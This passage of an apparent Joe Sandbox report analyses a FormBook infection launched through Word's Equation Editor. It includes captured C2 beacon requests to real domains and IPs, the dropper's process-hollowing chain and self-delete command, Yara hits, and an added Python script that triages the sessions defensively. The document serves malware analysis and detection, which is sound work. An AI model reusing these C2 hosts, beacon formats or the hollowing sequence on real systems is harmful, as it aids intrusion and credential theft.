                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
Jan 13, 2022 18:19:04.058167934 CET | 760 | IN | HTTP/1.1 200 OK
                                                                          Date: Thu, 13 Jan 2022 17:19:04 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2Mk9EhopbXMu42eavgK1yXE4PglsRvR8qjaVl2mNVBSizKR8WUmb1Wa+buflcm3md4clWQgYQYD4jU1VeTXlQg==
                                                                          Last-Modified: Thu, 13 Jan 2022 17:19:04 GMT
                                                                          X-Cache-Miss-From: parking-78bc4f798d-jmf9p
                                                                          Server: NginX
Data Raw: 35 63 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 32 4d 6b 39 45 68 6f 70 62 58 4d 75 34 32 65 61 76 67 4b 31 79 58 45 34 50 67 6c 73 52 76 52 38 71 6a 61 56 6c 32 6d 4e 56 42 53 69 7a 4b 52 38 57 55 6d 62 31 57 61 2b 62 75 66 6c 63 6d 33 6d 64 34 63 6c 57 51 67 59 51 59 44 34 6a 55 31 56 65 54 58 6c 51 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 65 61 6c 73 74 61 6b 65 70 6f 6f 6c 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 51 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 20 c3 a8 20 69 6e 20 76 65 6e 64 69 74 61 21 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 65 61 6c 73 74 61 6b 65 70 6f 6f 6c 20 52 69 73 6f 72 73 65 20 65 20 69 6e 66 6f 72 6d 61 7a 69 6f 6e 65 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 51 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 20 c3 a8 20 69 6e 20 76 65 6e 64 69 74 61 21 20 72 65 61 6c 73 74 61 6b 65 70 6f 6f 6c 2e 63 6f 6d 20 c3 a8 20 6c 61 20 70 72 69 6d 61 20 65 20 6d 69 67 6c 69 6f 72 20 66 6f 6e 74 65 20 70 65 72 20 74 75 74 74 65 20 6c 65 20 69 6e 66 6f 72 6d 61 7a 69 6f 6e 69 20 72 69 63 65 72 63 61 74 65 2e 20 44 61 20 74 65 6d 69 20 67 65 6e 65 72 61 6c 69 20 61
Data Ascii: 5c51<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2Mk9EhopbXMu42eavgK1yXE4PglsRvR8qjaVl2mNVBSizKR8WUmb1Wa+buflcm3md4clWQgYQYD4jU1VeTXlQg==><head><meta charset="utf-8"><title>realstakepool.com&nbsp;-&nbsp;Questo sito web è in vendita!&nbsp;-&nbsp;realstakepool Risorse e informazione.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="Questo sito web è in vendita! realstakepool.com è la prima e miglior fonte per tutte le informazioni ricercate. Da temi generali a
[Italian; the title reads "realstakepool.com - This website is for sale! - realstakepool Resources and information." The body is a Sedo domain-parking placeholder (see the img.sedoparking.com references and the parking- value of X-Cache-Miss-From), so www.realstakepool.com was not serving a live C2 at capture time.]
Jan 13, 2022 18:19:04.058192015 CET | 760 | IN | Data Raw: 70 69 c3 b9 20 64 69 20 71 75 65 6c 6c 6f 20 63 68 65 20 63 69 20 73 69 20 61 73 70 65 74 74 65 72 65 62 62 65 20 64 69 20 74 72 6f 76 61 72 65 20 71
Data Ascii: più di quello che ci si aspetterebbe di trovare q
Jan 13, 2022 18:19:04.058206081 CET | 761 | IN | Data Raw: 75 69 2c 20 72 65 61 6c 73 74 61 6b 65 70 6f 6f 6c 2e 63 6f 6d 20 63 26 23 30 33 39 3b c3 a8 20 74 75 74 74 6f 2e 20 4c 65 20 61 75 67 75 72 69 61 6d 6f 20 64 69 20 74 72 6f 76 61 72 65 20 63 69 c3 b2 20 63 68 65 20 63 65 72 63 61 21 22 3e 3c 6c
Data Ascii: ui, realstakepool.com c&#039;è tutto. Le auguriamo di trovare ciò che cerca!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> .container-custom-link{text-
Jan 13, 2022 18:19:04.058223963 CET | 762 | IN | Data Raw: 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73
Data Ascii: svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=s
Jan 13, 2022 18:19:04.058233976 CET | 763 | IN | Data Raw: 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31
Data Ascii: n:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container-header
Jan 13, 2022 18:19:04.058247089 CET | 764 | IN | Data Raw: 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 5f 5f 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e
Data Ascii: {margin:0 auto 0 auto;text-align:center}.container-header__content{color:#717171}.container-content{margin:25px auto 20px auto;text-align:center;background:url("//img.sedoparking.com/templates/bg/arrows-1-colors-3.png") #fbfbfb no-repeat cente
Jan 13, 2022 18:19:04.058264017 CET | 765 | IN | Data Raw: 6c 65 6d 65 6e 74 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 33 70 78 20 30 20 36 70 78 20 30 3b 6d 61 72 67 69 6e 3a 2e 31 31 65 6d 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 74 77 6f 2d 74 69
Data Ascii: lement-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#000}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#0a48ff}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-
Jan 13, 2022 18:19:04.058280945 CET | 767 | IN | Data Raw: 2d 62 6f 74 74 6f 6d 3a 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b
Data Ascii: -bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbox__button{border:0
Jan 13, 2022 18:19:04.058293104 CET | 767 | IN | Data Raw: 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23
Data Ascii: ent-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:
Jan 13, 2022 18:19:04.058305979 CET | 768 | IN | Data Raw: 73 6d 61 6c 6c 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72
Data Ascii: small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,
Jan 13, 2022 18:19:04.058319092 CET | 770 | IN | Data Raw: 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f
Data Ascii: r:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{backgrou
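The two captured sessions above, run through a small triage routine as an added example (not part of the Joe Sandbox report). The session records are constructed from the capture: originating process, destination, request line, response status and the headers and body fragments that matter. Three points are worth automating: a Windows shell process (explorer.exe) originating HTTP, the shape of the beacon URI, and a response that is a redirect or a domain-parking page rather than a live C2. The regex BEACON_RE is an assumption generalised from these two requests, not a published FormBook signature, and svchost.exe in SYSTEM_PROCESSES is an assumed addition; tune both before using them on real proxy logs.

```python
"""Triage of the HTTP sessions captured in the report (added example).

Session records are constructed from the capture above. The beacon-shape regex
is an assumption drawn from the two requests shown, not a documented signature.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Processes that should not originate HTTP themselves. explorer.exe doing so is the
# injection indicator this capture shows; svchost.exe is an assumed addition.
SYSTEM_PROCESSES = {r"c:\windows\explorer.exe", r"c:\windows\system32\svchost.exe"}

# Assumed heuristic: short path segment, short key = long base64-ish blob, short key = id.
BEACON_RE = re.compile(
    r"^GET /[A-Za-z0-9]{2,6}/\?[A-Za-z0-9]{1,4}=[A-Za-z0-9+/=]{20,}"
    r"&[A-Za-z0-9]{1,4}=[A-Za-z0-9]{4,} HTTP/1\.[01]$"
)


@dataclass
class Session:
    session_id: int
    process: str
    dst: str                      # "ip:port"
    request_line: str
    request_headers: dict = field(default_factory=dict)
    status_line: str = ""
    response_headers: dict = field(default_factory=dict)
    body_fragment: str = ""


def query_params(request_line: str) -> dict:
    """Split the query string without percent/plus decoding so base64 '+' survives."""
    target = request_line.split(" ")[1]
    query = urlsplit(target).query
    return dict(p.split("=", 1) for p in query.split("&") if "=" in p)


def triage(s: Session) -> list:
    """Return the indicator labels that apply to one session, in a fixed order."""
    findings = []
    if s.process.lower() in SYSTEM_PROCESSES:
        findings.append("system-process-egress")
    if BEACON_RE.match(s.request_line):
        findings.append("beacon-shaped-uri")
    status = int(s.status_line.split(" ")[1]) if s.status_line else 0
    location = s.response_headers.get("Location", "")
    if status in (301, 302, 307, 308) and location.startswith("https://"):
        findings.append("redirected-to-https")
    if (s.response_headers.get("X-Cache-Miss-From", "").startswith("parking")
            or "sedoparking.com" in s.body_fragment):
        findings.append("parked-domain")   # decoy or dead domain, not a live C2 at capture time
    return findings


def shared_query_params(sessions) -> dict:
    """Parameters identical (name and value) across all requests: a pivot for correlating
    beacons from the same infection in proxy logs."""
    param_sets = [query_params(s.request_line) for s in sessions]
    common = set(param_sets[0].items())
    for p in param_sets[1:]:
        common &= set(p.items())
    return dict(common)


SESSIONS = [  # constructed from the capture above
    Session(3, r"C:\Windows\explorer.exe", "109.94.209.123:80",
            "GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1",
            {"Host": "www.extraordinarymiracle.com", "Connection": "close"},
            "HTTP/1.1 301 Moved Permanently",
            {"Server": "nginx/1.20.1",
             "Location": "https://www.extraordinarymiracle.com:443/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i"},
            "<title>301 Moved Permanently</title>"),
    Session(4, r"C:\Windows\explorer.exe", "91.195.240.13:80",
            "GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1",
            {"Host": "www.realstakepool.com", "Connection": "close"},
            "HTTP/1.1 200 OK",
            {"Server": "NginX", "X-Cache-Miss-From": "parking-78bc4f798d-jmf9p"},
            '<link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/>'),
]


def triage_all(sessions=SESSIONS) -> dict:
    """Map session id to its findings for every captured session."""
    return {s.session_id: triage(s) for s in sessions}


if __name__ == "__main__":
    for sid, labels in triage_all().items():
        print(sid, labels)
    print("shared across beacons:", shared_query_params(SESSIONS))
```

The trailing WZ8=Jpspdz90i parameter is the same in both requests while the o6 blob changes, which is why shared_query_params is the more useful pivot when hunting for further beacons from the same host.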


                                                                          Code Manipulations

                                                                          Statistics

                                                                          CPU Usage


                                                                          Memory Usage


                                                                          High Level Behavior Distribution


                                                                          Behavior


                                                                          System Behavior

                                                                          General

                                                                          Start time:18:16:16
                                                                          Start date:13/01/2022
                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                          Imagebase:0x13f140000
                                                                          File size:1423704 bytes
                                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:18:16:18
                                                                          Start date:13/01/2022
                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                          Imagebase:0x400000
                                                                          File size:543304 bytes
                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:18:16:19
                                                                          Start date:13/01/2022
                                                                          Path:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Imagebase:0xad0000
                                                                          File size:707072 bytes
                                                                          MD5 hash:8807C2E0F2973A22812AF6E61BA72667
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 34%, Metadefender, Browse
                                                                          • Detection: 51%, ReversingLabs
                                                                          Reputation:low

                                                                          General

                                                                          Start time:18:16:24
                                                                          Start date:13/01/2022
                                                                          Path:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:{path}
                                                                          Imagebase:0xad0000
                                                                          File size:707072 bytes
                                                                          MD5 hash:8807C2E0F2973A22812AF6E61BA72667
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
Programmed in:C, C++ or other language (same file and MD5 as the .NET instance above; the Yara hits for this instance sit at 0x00400000 rather than at the 0xad0000 image base of the file on disk, consistent with the re-launched process being hollowed and the native FormBook payload mapped in its place)
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          General

                                                                          Start time:18:16:27
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0xffa10000
                                                                          File size:3229696 bytes
                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:high

                                                                          General

                                                                          Start time:18:16:40
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\SysWOW64\msdt.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                          Imagebase:0xc40000
                                                                          File size:983040 bytes
                                                                          MD5 hash:F67A64C46DE10425045AF682802F5BA6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:18:16:44
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
                                                                          Imagebase:0x4a2b0000
                                                                          File size:302592 bytes
                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Disassembly

                                                                          Code Analysis


                                                                            Execution Graph

                                                                            Execution Coverage:18.3%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:43
                                                                            Total number of Limit Nodes:0

                                                                            Graph

                                                                            Execution graph (raw node/edge dump omitted). The executed nodes resolve to the following API calls: CreateProcessW, ResumeThread, ReadProcessMemory, WriteProcessMemory, Wow64SetThreadContext, VirtualAllocEx and VirtualProtect (the latter reached via a shared helper at 4491a8).

                                                                            Executed Functions

                                                                            Control-flow Graph (legend: Executed / Not Executed; raw basic-block edge dump omitted; the first block calls helpers at 370788, 370798 and 37c918)
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (.Pk$(.Pk$4{Pk$4{Pk$DtPk
                                                                            • API String ID: 0-485576172
                                                                            • Opcode ID: 0f245ae74aab8381d37433354f88060b914b78a2e65527e1f0c4648b46a8253c
                                                                            • Instruction ID: 67209c9cc5953c80edb16a1dc66899baff12bb0eddfdc34df804df80ecb93b92
                                                                            • Opcode Fuzzy Hash: 0f245ae74aab8381d37433354f88060b914b78a2e65527e1f0c4648b46a8253c
                                                                            • Instruction Fuzzy Hash: 61F39374A44628CFD764DF24C894E99B7B2FF49305F1581EAE909AB361DB31AE81CF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph (legend: Executed / Not Executed; raw basic-block edge dump omitted)
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,/0m$,/0m
                                                                            • API String ID: 0-3210878908
                                                                            • Opcode ID: 714a0da0a229848d77513bddbd619124ca798f2a6726c8d11036a38a0d136224
                                                                            • Instruction ID: 68ac040e409a782c23e8b03c61603595f0986bde30d51ed271b20d971286ac0a
                                                                            • Opcode Fuzzy Hash: 714a0da0a229848d77513bddbd619124ca798f2a6726c8d11036a38a0d136224
                                                                            • Instruction Fuzzy Hash: 13020370A08256CFC722CBA9C8456BABBF5BF45310F15C67BE459DBA92C338C846C752
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%


                                                                            Control-flow Graph (legend: Executed / Not Executed; raw basic-block edge dump omitted; the function calls helpers at 37d5f0, 37d6ca, 440218 and, depending on the path taken, 37f220, 37f0f9 or 37f108)
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `!0m$`!0m$fCl
                                                                            • API String ID: 0-655585357
                                                                            • Opcode ID: c477ece5433b730df6efcc54d18ede40b07bb6303c2c4a4f81dcf3627a948d7b
                                                                            • Instruction ID: c4403b112706c55b708edc3dc13642830ffe82a34cdfd5c7b55bd178a27a9656
                                                                            • Opcode Fuzzy Hash: c477ece5433b730df6efcc54d18ede40b07bb6303c2c4a4f81dcf3627a948d7b
                                                                            • Instruction Fuzzy Hash: 4A419F74B00205CFDB25DBA5D8157AE76F6AF88304F108436E90ADB385DF789D41CBA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

